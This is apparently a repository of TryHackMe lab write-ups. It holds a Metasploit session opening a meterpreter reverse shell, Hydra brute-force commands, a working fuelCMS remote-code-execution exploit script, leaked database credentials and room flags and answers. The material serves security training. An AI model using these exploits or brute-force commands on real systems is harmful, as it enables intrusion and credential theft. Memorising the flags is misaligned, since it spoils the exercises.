```supernootnoot``` 273 | 274 | #2 What is the root.txt : ```congratulations!!!!``` 275 | -------------------------------------------------------------------------------- /CC-Pentesting/Task 10 - Section 3 - Metasploit Final Walkthrough.txt: -------------------------------------------------------------------------------- 1 | ╭─root@kali ~/TryHackMe/Rooms/CC-Pentesting ‹master*› 2 | ╰─# msfconsole 3 | [-] ***rting the Metasploit Framework console...\ 4 | [-] * WARNING: No database support: No database YAML file 5 | [-] *** 6 | 7 | 8 | .:okOOOkdc' 'cdkOOOko:. 9 | .xOOOOOOOOOOOOc cOOOOOOOOOOOOx. 10 | :OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO: 11 | 'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO' 12 | oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo 13 | dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx 14 | lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl 15 | .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO. 16 | cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc 17 | oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo 18 | lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl 19 | ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO; 20 | .dOOo'WM.OOOOocccxOOOO.MX'xOOd. 21 | ,kOl'M.OOOOOOOOOOOOO.M'dOk, 22 | :kk;.OOOOOOOOOOOOO.;Ok: 23 | ;kOOOOOOOOOOOOOOOk: 24 | ,xOOOOOOOOOOOx, 25 | .lOOOOOOOl. 26 | ,dOd, 27 | . 28 | 29 | =[ metasploit v5.0.67-dev ] 30 | + -- --=[ 1957 exploits - 1093 auxiliary - 336 post ] 31 | + -- --=[ 562 payloads - 45 encoders - 10 nops ] 32 | + -- --=[ 7 evasion ] 33 | 34 | msf5 > use exploit/multi/http/nostromo_code_exec 35 | msf5 exploit(multi/http/nostromo_code_exec) > set RHOSTS 10.10.57.13 36 | RHOSTS => 10.10.57.13 37 | msf5 exploit(multi/http/nostromo_code_exec) > set RPORT 80 38 | RPORT => 80 39 | msf5 exploit(multi/http/nostromo_code_exec) > check 40 | [*] 10.10.57.13:80 - The target appears to be vulnerable. 41 | msf5 exploit(multi/http/nostromo_code_exec) > set target 1 42 | target => 1 43 | msf5 exploit(multi/http/nostromo_code_exec) > set payload linux/x86/meterpreter/reverse_tcp 44 | payload => linux/x86/meterpreter/reverse_tcp 45 | msf5 exploit(multi/http/nostromo_code_exec) > set LHOST tun0 46 | LHOST => tun0 47 | msf5 exploit(multi/http/nostromo_code_exec) > show options 48 | 49 | Module options (exploit/multi/http/nostromo_code_exec): 50 | 51 | Name Current Setting Required Description 52 | ---- --------------- -------- ----------- 53 | Proxies no A proxy chain of format type:host:port[,type:host:port][...] 54 | RHOSTS 10.10.57.13 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' 55 | RPORT 80 yes The target port (TCP) 56 | SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 57 | SRVPORT 8080 yes The local port to listen on. 58 | SSL false no Negotiate SSL/TLS for outgoing connections 59 | SSLCert no Path to a custom SSL certificate (default is randomly generated) 60 | URIPATH no The URI to use for this exploit (default is random) 61 | VHOST no HTTP server virtual host 62 | 63 | 64 | Payload options (linux/x86/meterpreter/reverse_tcp): 65 | 66 | Name Current Setting Required Description 67 | ---- --------------- -------- ----------- 68 | LHOST tun0 yes The listen address (an interface may be specified) 69 | LPORT 4444 yes The listen port 70 | 71 | 72 | Exploit target: 73 | 74 | Id Name 75 | -- ---- 76 | 1 Automatic (Linux Dropper) 77 | 78 | msf5 exploit(multi/http/nostromo_code_exec) > run 79 | 80 | [] Started reverse TCP handler on 10.9.11.171:4444 81 | [] Configuring Automatic (Linux Dropper) target 82 | [] Sending linux/x86/meterpreter/reverse_tcp command stager 83 | [] Sending stage (985320 bytes) to 10.10.57.13 84 | [] Meterpreter session 1 opened (10.9.11.171:4444 -> 10.10.57.13:38766) at 2020-04-05 17:33:50 +0530 85 | [] Command Stager progress - 100.00% done (763/763 bytes) 86 | 87 | meterpreter > sysinfo 88 | Computer : 10.10.57.13 89 | OS : Ubuntu 16.04 (Linux 4.4.0-142-generic) 90 | Architecture : x64 91 | BuildTuple : i486-linux-musl 92 | Meterpreter : x86/linux 93 | 94 | meterpreter > cd /var/nostromo/htdocs/ 95 | meterpreter > ls 96 | Listing: /var/nostromo/htdocs 97 | ============================= 98 | 99 | Mode Size Type Last modified Name 100 | ---- ---- ---- ------------- ---- 101 | 100644/rw-r--r-- 564 fil 2019-12-06 09:36:36 +0530 index.html 102 | 100644/rw-r--r-- 1827 fil 2019-12-06 09:36:36 +0530 nostromo.gif 103 | 40755/rwxr-xr-x 4096 dir 2019-12-06 09:38:09 +0530 s3cretd1r 104 | 105 | meterpreter > cd s3cretd1r 106 | meterpreter > ls 107 | Listing: /var/nostromo/htdocs/s3cretd1r 108 | ======================================= 109 | 110 | Mode Size Type Last modified Name 111 | ---- ---- ---- ------------- ---- 112 | 100644/rw-r--r-- 8 fil 2019-12-06 09:38:09 +0530 nice 113 | 114 | meterpreter > cat nice 115 | Woohoo! 116 | 117 | meterpreter > exit 118 | 119 | msf5 exploit(multi/http/nostromo_code_exec) > exit -y 120 | -------------------------------------------------------------------------------- /CC-Pentesting/exam/gobuster.txt: -------------------------------------------------------------------------------- 1 | /.hta (Status: 403) 2 | /.htaccess (Status: 403) 3 | /.htpasswd (Status: 403) 4 | /index.html (Status: 200) 5 | /secret (Status: 301) 6 | /server-status (Status: 403) 7 | -------------------------------------------------------------------------------- /CC-Pentesting/exam/gobuster_secret.txt: -------------------------------------------------------------------------------- 1 | /.hta (Status: 403) 2 | /.hta.txt (Status: 403) 3 | /.htaccess (Status: 403) 4 | /.htaccess.txt (Status: 403) 5 | /.htpasswd (Status: 403) 6 | /.htpasswd.txt (Status: 403) 7 | /index.html (Status: 200) 8 | /secret.txt (Status: 200) 9 | -------------------------------------------------------------------------------- /CC-Pentesting/exam/hash.txt: -------------------------------------------------------------------------------- 1 | Hash : 046385855FC9580393853D8E81F240B66FE9A7B8 2 | 3 | Type : sha1 4 | 5 | Result : nyan 6 | -------------------------------------------------------------------------------- /CC-Pentesting/exam/nmap.txt: -------------------------------------------------------------------------------- 1 | nmap -A 10.10.162.177 2 | Starting Nmap 7.80 ( https://nmap.org/ ) at 2020-04-05 20:01 IST 3 | Nmap scan report for 10.10.162.177 4 | Host is up (0.20s latency). 5 | Not shown: 998 closed ports 6 | PORT STATE SERVICE VERSION 7 | 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) 8 | | ssh-hostkey: 9 | | 2048 12:96:a6:1e:81:73:ae:17:4c:e1:7c:63:78:3c:71:1c (RSA) 10 | | 256 6d:9c:f2:07:11:d2:aa:19:99:90:bb:ec:6b:a1:53:77 (ECDSA) 11 | |_ 256 0e:a5:fa:ce:f2:ad:e6:fa:99:f3:92:5f:87:bb:ba:f4 (ED25519) 12 | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 13 | |_http-server-header: Apache/2.4.18 (Ubuntu) 14 | |_http-title: Apache2 Ubuntu Default Page: It works 15 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 16 | TCP/IP fingerprint: 17 | OS:SCAN(V=7.80%E=4%D=4/5%OT=22%CT=1%CU=41105%PV=Y%DS=2%DC=T%G=Y%TM=5E89EBC4 18 | OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)OPS( 19 | OS:O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST11 20 | OS:NW6%O6=M54DST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN( 21 | OS:R=Y%DF=Y%T=40%W=6903%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS 22 | OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R= 23 | OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F= 24 | OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T 25 | OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD= 26 | OS:S) 27 | 28 | Network Distance: 2 hops 29 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 30 | 31 | TRACEROUTE (using port 8080/tcp) 32 | HOP RTT ADDRESS 33 | 1 194.70 ms 10.9.0.1 34 | 2 195.12 ms 10.10.162.177 35 | -------------------------------------------------------------------------------- /CC-Pentesting/exam/secret.txt: -------------------------------------------------------------------------------- 1 | # Path : http://10.10.162.177/secret/secret.txt 2 | 3 | nyan:046385855FC9580393853D8E81F240B66FE9A7B8 4 | -------------------------------------------------------------------------------- /CC-Pentesting/exam/ssh.txt: -------------------------------------------------------------------------------- 1 | ssh nyan@10.10.162.177 2 | The authenticity of host '10.10.162.177 (10.10.162.177)' can't be established. 3 | ECDSA key fingerprint is SHA256:haqegvkQqmIEEzS0Mcd+NUsONboBQ6z3wQSwq+aj5Es. 4 | Are you sure you want to continue connecting (yes/no/[fingerprint])? yes 5 | Warning: Permanently added '10.10.162.177' (ECDSA) to the list of known hosts. 6 | nyan@10.10.162.177's password: 7 | Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64) 8 | 9 | * Documentation: https://help.ubuntu.com 10 | * Management: https://landscape.canonical.com 11 | * Support: https://ubuntu.com/advantage 12 | Last login: Sat Dec 21 08:37:54 2019 13 | nyan@ubuntu:~$ ls 14 | user.txt 15 | nyan@ubuntu:~$ cat user.txt 16 | supernootnoot 17 | nyan@ubuntu:~$ sudo -l 18 | Matching Defaults entries for nyan on ubuntu: 19 | env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin 20 | 21 | User nyan may run the following commands on ubuntu: 22 | (root) NOPASSWD: /bin/su 23 | nyan@ubuntu:~$ sudo su 24 | root@ubuntu:/home/nyan# cd ~ 25 | root@ubuntu:~# ls 26 | root.txt 27 | root@ubuntu:~# cat root.txt 28 | congratulations!!!! 29 | -------------------------------------------------------------------------------- /CC-Pentesting/gobuster_10.10.56.144: -------------------------------------------------------------------------------- 1 | /.hta (Status: 403) 2 | /.htaccess (Status: 403) 3 | /.htpasswd (Status: 403) 4 | /index.html (Status: 200) 5 | /secret (Status: 301) 6 | /server-status (Status: 403) 7 | -------------------------------------------------------------------------------- /CC-Pentesting/gobuster_xxa_10.10.56.144: -------------------------------------------------------------------------------- 1 | /.htpasswd (Status: 403) 2 | /.htpasswd.xxa (Status: 403) 3 | /.htaccess (Status: 403) 4 | /.htaccess.xxa (Status: 403) 5 | /password.xxa (Status: 200) 6 | -------------------------------------------------------------------------------- /CC-Pentesting/nmap_10.10.253.33.txt: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Sun Apr 5 12:15:16 2020 as: nmap -sCSV -A -O -oN nmap_10.10.253.33.txt 10.10.253.33 2 | Nmap scan report for 10.10.253.33 3 | Host is up (0.85s latency). 4 | Not shown: 999 closed ports 5 | PORT STATE SERVICE VERSION 6 | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 7 | |_http-server-header: Apache/2.4.18 (Ubuntu) 8 | |_http-title: Apache2 Ubuntu Default Page: It works 9 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 10 | TCP/IP fingerprint: 11 | OS:SCAN(V=7.80%E=4%D=4/5%OT=80%CT=1%CU=31758%PV=Y%DS=2%DC=T%G=Y%TM=5E897ECC 12 | OS:%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=104%TI=Z%CI=I%II=I%TS=8)SEQ( 13 | OS:SP=107%GCD=1%ISR=104%TI=Z%II=I%TS=8)OPS(O1=M54DST11NW6%O2=M54DST11NW6%O3 14 | OS:=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST11NW6%O6=M54DST11)WIN(W1=68DF%W2=6 15 | OS:8DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M54DNNSNW 16 | OS:6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF 17 | OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O= 18 | OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W= 19 | OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI 20 | OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) 21 | 22 | Network Distance: 2 hops 23 | 24 | TRACEROUTE (using port 3389/tcp) 25 | HOP RTT ADDRESS 26 | 1 433.82 ms 10.9.0.1 27 | 2 434.82 ms 10.10.253.33 28 | 29 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 30 | # Nmap done at Sun Apr 5 12:16:36 2020 -- 1 IP address (1 host up) scanned in 79.76 seconds 31 | -------------------------------------------------------------------------------- /CC-Steganography/README.md: -------------------------------------------------------------------------------- 1 | # CC Steganography | https://tryhackme.com/room/ccstego 2 | 3 | ### [Task 2] Steghide 4 | 5 | Steghide is one of the most famous steganography tools, and for good reason. It's a classic method, hiding a message inside an image, and steghide does it effectively and efficiently. A downside of steghide is that it only works on jpgs; however, that means that if you believe there is a hidden message inside a jpg, then steghide is a probable option. 6 | 7 | One of the greatest benefits of stegohide, is that it can encrypt data with a passphrase. Meaning that if they don't have the password then they can't extract any data. 8 | 9 | steghide can be installed with the command ```sudo apt install steghide``` 10 | 11 | #1 What argument allows you to embed data(such as files) into other files? : ```embed``` 12 | 13 | #2 What flag let's you set the file to embed? : ```-ef``` 14 | 15 | #3 What flag allows you to set the "cover file"?(i.e the jpg) : ```-cf``` 16 | 17 | #4 How do you set the password to use for the cover file? : ```-p``` 18 | 19 | #5 What argument allows you to extract data from files? : ```extract``` 20 | 21 | #6 How do you select the file that you want to extract data from? : ```-sf``` 22 | 23 | #7 Given the passphrase "password123", what is the hidden message in the included "jpeg1" file. : ```pinguftw``` 24 | 25 | ### [Task 3] zsteg 26 | 27 | zsteg is to png's what steghide is to jpg's. It supports various techniques to extract any and all data from png files. 28 | 29 | Note: zsteg also supports BMP files, but it is primarily used for png's. 30 | 31 | zsteg can be installed by using ruby with the command ```gem install zsteg``` 32 | 33 | #1 How do you specify that the least significant bit comes first : ```--lsb``` 34 | 35 | #2 What about the most significant bit? : ```--msb``` 36 | 37 | #3 How do you specify verbose mode? : ```-v``` 38 | 39 | #4 How do you extract the data from a specific payload? : ```-E``` 40 | 41 | #5 In the included file "png1" what is the hidden message? : ```nootnoot$``` 42 | 43 | #6 What about the payload used to encrypt it. : ```b1,bgr,lsb,xy``` 44 | 45 | ### [Task 4] Exiftool 46 | 47 | Exiftool is a tool that allows you to view and edit image metadata. While this in itself is not a stego tool, I would be remiss not to include at least a footnote on it as one of the most popular forms of image stego is to hide messages in the metadata. 48 | 49 | Exiftool can be installed with sudo apt install exiftool 50 | 51 | #1 In the included jpeg3 file, what is the document name? : ```Hello :)``` 52 | 53 | ### [Task 5] Stegoveritas 54 | 55 | Personally this is one of my favorite image stego tools. It supports just about every image file, and is able to extract all types of data from it. It is an incredibly useful tool if you don't know exactly what you're looking for, as it has a myriad of built in tests to extract any and all data. 56 | 57 | Note: Stegoveritas has other features as well such as color correcting images 58 | 59 | Stegoveritas can be installed by running these two commands: 60 | 61 | ```pip3 install stegoveritas``` 62 | 63 | ```stegoveritas_install_deps``` 64 | 65 | #1 How do you check the file for metadata? : ```-meta``` 66 | 67 | #2 How do you check for steghide hidden information : ```-steghide``` 68 | 69 | #3 What flag allows you to extract LSB data from the image? : ```-extractLSB``` 70 | 71 | #4 In the included image jpeg2 what is the hidden message? : ```kekekekek``` 72 | 73 | ### [Task 6] Spectrograms 74 | 75 | Spectrogram stegonography is the art of hiding hidden an image inside in an audio file's spectogram. Therefore when ever dealing with audio stego it is always worth analyzing the spectrogram of the audio. To do this task we will be using [Sonic Visualizer](https://www.sonicvisualiser.org/download.html). 76 | 77 | Note: This introduction will be done using the included wav1 file. 78 | 79 | When you open Sonic Visualizer you should see this screen: 80 | 81 | From there click File->Open and then select the included wav1 file and you should see a screen similar to this: 82 | 83 | From there click Layer->Add Spectrogram and you should see this: 84 | 85 | And that's it! 86 | 87 | #1 What is the hidden text in the included wav2 file? : ```Google``` 88 | 89 | ### [Task 7] The Final Exam 90 | 91 | Good luck and have fun! 92 | 93 | #1 What is key 1? : ```superkeykey``` 94 | 95 | #2 What is key 2? : ```fatality``` 96 | 97 | #3 What is key 3? : ```killshot``` 98 | -------------------------------------------------------------------------------- /CC-Steganography/Tools/exiftool.txt: -------------------------------------------------------------------------------- 1 | sudo apt install exiftool -------------------------------------------------------------------------------- /CC-Steganography/Tools/sonic visualiser.txt: -------------------------------------------------------------------------------- 1 | https://www.sonicvisualiser.org/download.html -------------------------------------------------------------------------------- /CC-Steganography/Tools/steghide.txt: -------------------------------------------------------------------------------- 1 | sudo apt install steghide -------------------------------------------------------------------------------- /CC-Steganography/Tools/stegoveritas.txt: -------------------------------------------------------------------------------- 1 | pip3 install stegoveritas && stegoveritas_install_deps -------------------------------------------------------------------------------- /CC-Steganography/Tools/zsteg.txt: -------------------------------------------------------------------------------- 1 | gem install zsteg -------------------------------------------------------------------------------- /CC-Steganography/spect/KTrtNI5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/KTrtNI5.png -------------------------------------------------------------------------------- /CC-Steganography/spect/exam1.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/exam1.jpeg -------------------------------------------------------------------------------- /CC-Steganography/spect/exam2.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/exam2.wav -------------------------------------------------------------------------------- /CC-Steganography/spect/happynoot.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/happynoot.jpeg -------------------------------------------------------------------------------- /CC-Steganography/spect/jpeg1.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/jpeg1.jpeg -------------------------------------------------------------------------------- /CC-Steganography/spect/jpeg2.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/jpeg2.jpeg -------------------------------------------------------------------------------- /CC-Steganography/spect/jpeg3.jpeg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/jpeg3.jpeg -------------------------------------------------------------------------------- /CC-Steganography/spect/png1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/png1.png -------------------------------------------------------------------------------- /CC-Steganography/spect/qrcode(edited).png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/qrcode(edited).png -------------------------------------------------------------------------------- /CC-Steganography/spect/qrcode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/qrcode.png -------------------------------------------------------------------------------- /CC-Steganography/spect/wav1.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/wav1.wav -------------------------------------------------------------------------------- /CC-Steganography/spect/wav2.wav: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/CC-Steganography/spect/wav2.wav -------------------------------------------------------------------------------- /Djinn/README.md: -------------------------------------------------------------------------------- 1 | # djinn | https://tryhackme.com/room/djinn 2 | 3 | ### [Task 2] Root It 4 | 5 | Get both user.txt and root.txt 6 | 7 | #1 User flag : 10aay8289ptgguy1pvfa73alzusyyx3c 8 | 9 | #2 Root flag : 33eur2wjdmq80z47nyy4fx54bnlg3ibc 10 | -------------------------------------------------------------------------------- /Google Dorking/README.md: -------------------------------------------------------------------------------- 1 | Google Dorking | https://tryhackme.com/room/googledorking 2 | 3 | ### [Task 2] Let's Learn About Crawlers 4 | 5 | #1 What is the keyword for the contents that a "Search Engine" stores about a website? : ```index``` 6 | 7 | #2 What is the name of the technique that "Search Engines" use to retrieve this information about websites? : ```crawling``` 8 | 9 | #3 What is an example of the type of contents that could be gathered from a website? : ```keywords``` 10 | 11 | ### [Task 3] Enter: Search Engine Optimisation 12 | 13 | #1 Using the SEO Site Checkup tool on "tryhackme.com", does TryHackMe pass the “Meta Title Test”? (Yea / Nay) : ```Yea``` 14 | 15 | #2 Does "tryhackme.com" pass the “Keywords Usage Test?” (Yea / Nay) : ```Nay``` 16 | 17 | #3 Use https://neilpatel.com/seo-analyzer/ to analyse https://blog.cmnatic.co.uk , What "Page Score" does the Domain receive out of 100? : ```81/100``` 18 | 19 | #4 With the same tool and domain in Question #3 (previous), How many pages use “flash” : ```0``` 20 | 21 | #5 From a "rating score" perspective alone, what website would list first? tryhackme.com or blog.cmnatic.co.uk : ```blog.cmnatic.co.uk``` 22 | 23 | ### [Task 4] Beepboop - Robots.txt 24 | 25 | #1 Where would "robots.txt" be located on the domain "ablog.com" : ```ablog.com/robots.txt``` 26 | 27 | #2 If a website was to have a sitemap, where would that be located? : ```/sitemap.xml``` 28 | 29 | #3 How would we only allow Bingbot to index the website? : ```user-agent :bingbot``` 30 | 31 | #4 How would we prevent a "Crawler" from indexing the directory "/dont-index-me/"? : ```disallow: /dont-index-me/``` 32 | 33 | #5 What is another configuration file that we might want to hide from "Crawlers"? : ```.conf``` 34 | 35 | ### [Task 5] Sitemaps 36 | 37 | #1 What is the typical file structure of a "Sitemap"? : ```XML``` 38 | 39 | #2 What real life example can "Sitemaps" be compared to? : ```MAP``` 40 | 41 | #3 Name the keyword for the path taken for content on a website : ```route``` 42 | 43 | ### [Task 6] What is Google Dorking? 44 | 45 | #1 What would be the format used to query the site bbc.co.uk about flood defences : ```site: bbc.co.uk flood defences``` 46 | 47 | #2 What term would you use to search by file type? : ```filetype:``` 48 | 49 | #3 What term can we use to look for login pages? : ```intitle: login``` 50 | -------------------------------------------------------------------------------- /Hydra/README.md: -------------------------------------------------------------------------------- 1 | # Hydra | https://tryhackme.com/room/hydra 2 | 3 | ### [Task 2] Using Hydra 4 | 5 | #1 Use Hydra to bruteforce molly's web password. What is flag 1? : `THM{2673a7dd116de68e85c48ec0b1f2612e}` 6 | 7 | 8 | 9 | #2 Use Hydra to bruteforce molly's SSH password. What is flag 2? : `THM{c8eeb0468febbadea859baeb33b2541b}` 10 | 11 | 12 | -------------------------------------------------------------------------------- /Hydra/flag2.txt: -------------------------------------------------------------------------------- 1 | THM{c8eeb0468febbadea859baeb33b2541b} -------------------------------------------------------------------------------- /Hydra/ssh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Hydra/ssh.png -------------------------------------------------------------------------------- /Hydra/ssh.txt: -------------------------------------------------------------------------------- 1 | hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.34.149 -t 4 ssh 2 | 3 | Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. 4 | 5 | Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-05-25 11:37:13 6 | [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task 7 | [DATA] attacking ssh://10.10.34.149:22/ 8 | [22][ssh] host: 10.10.34.149 login: molly password: butterfly 9 | 1 of 1 target successfully completed, 1 valid password found 10 | Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-05-25 12:03:07 -------------------------------------------------------------------------------- /Hydra/web.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Hydra/web.png -------------------------------------------------------------------------------- /Hydra/web.txt: -------------------------------------------------------------------------------- 1 | hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.34.149 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V 2 | 3 | [80][http-post-form] host: 10.10.34.149 login: molly password: sunshine -------------------------------------------------------------------------------- /Ignite/CVE-2018-16763.py: -------------------------------------------------------------------------------- 1 | # Exploit Title: fuelCMS 1.4.1 - Remote Code Execution 2 | # CVE : CVE-2018-16763 3 | 4 | import requests 5 | import urllib 6 | 7 | url = "http://10.10.12.120" 8 | def find_nth_overlapping(haystack, needle, n): 9 | start = haystack.find(needle) 10 | while start >= 0 and n > 1: 11 | start = haystack.find(needle, start+1) 12 | n -= 1 13 | return start 14 | 15 | while 1: 16 | xxxx = raw_input('cmd:') 17 | burp0_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.quote(xxxx)+"%27%29%2b%27" 18 | proxy = {"http":"http://10.10.12.120:80"} 19 | r = requests.get(burp0_url) 20 | 21 | html = "" 22 | htmlcharset = r.text.find(html) 23 | 24 | begin = r.text[0:20] 25 | dup = find_nth_overlapping(r.text,begin,2) 26 | 27 | print r.text[0:dup] -------------------------------------------------------------------------------- /Ignite/README.md: -------------------------------------------------------------------------------- 1 | # Ignite | https://tryhackme.com/room/ignite 2 | 3 | ### [Task 1] Root It 4 | 5 | #1 User.txt : `6470e394cbf6dab6a91682cc8585059b` 6 | 7 | #2 Root.txt : `b9bbcb33e11b80be759c4e844862482d` 8 | -------------------------------------------------------------------------------- /Ignite/database.php: -------------------------------------------------------------------------------- 1 | db->last_query() and profiling of DB queries. 62 | | When you run a query, with this setting set to TRUE (default), 63 | | CodeIgniter will store the SQL statement for debugging purposes. 64 | | However, this may cause high memory usage, especially if you run 65 | | a lot of SQL queries ... disable this to avoid that problem. 66 | | 67 | | The $active_group variable lets you choose which connection group to 68 | | make active. By default there is only one group (the 'default' group). 69 | | 70 | | The $query_builder variables lets you determine whether or not to load 71 | | the query builder class. 72 | */ 73 | $active_group = 'default'; 74 | $query_builder = TRUE; 75 | 76 | $db['default'] = array( 77 | 'dsn' => '', 78 | 'hostname' => 'localhost', 79 | 'username' => 'root', 80 | 'password' => 'mememe', 81 | 'database' => 'fuel_schema', 82 | 'dbdriver' => 'mysqli', 83 | 'dbprefix' => '', 84 | 'pconnect' => FALSE, 85 | 'db_debug' => (ENVIRONMENT !== 'production'), 86 | 'cache_on' => FALSE, 87 | 'cachedir' => '', 88 | 'char_set' => 'utf8', 89 | 'dbcollat' => 'utf8_general_ci', 90 | 'swap_pre' => '', 91 | 'encrypt' => FALSE, 92 | 'compress' => FALSE, 93 | 'stricton' => FALSE, 94 | 'failover' => array(), 95 | 'save_queries' => TRUE 96 | ); 97 | 98 | // used for testing purposes 99 | if (defined('TESTING')) 100 | { 101 | @include(TESTER_PATH.'config/tester_database'.EXT); 102 | } 103 | -------------------------------------------------------------------------------- /Ignite/database.txt: -------------------------------------------------------------------------------- 1 | cat /var/www/html/fuel/application/config/database.php -------------------------------------------------------------------------------- /Ignite/exploit-db.txt: -------------------------------------------------------------------------------- 1 | https://www.exploit-db.com/exploits/47138 -------------------------------------------------------------------------------- /Ignite/nmap_basic.nmap: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Mon May 25 14:51:09 2020 as: nmap -A -oN nmap_basic.nmap 10.10.12.120 2 | Nmap scan report for 10.10.12.120 3 | Host is up (0.26s latency). 4 | Not shown: 999 closed ports 5 | PORT STATE SERVICE VERSION 6 | 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) 7 | | http-robots.txt: 1 disallowed entry 8 | |_/fuel/ 9 | |_http-server-header: Apache/2.4.18 (Ubuntu) 10 | |_http-title: Welcome to FUEL CMS 11 | No exact OS matches for host (If you know what OS is running on it, see 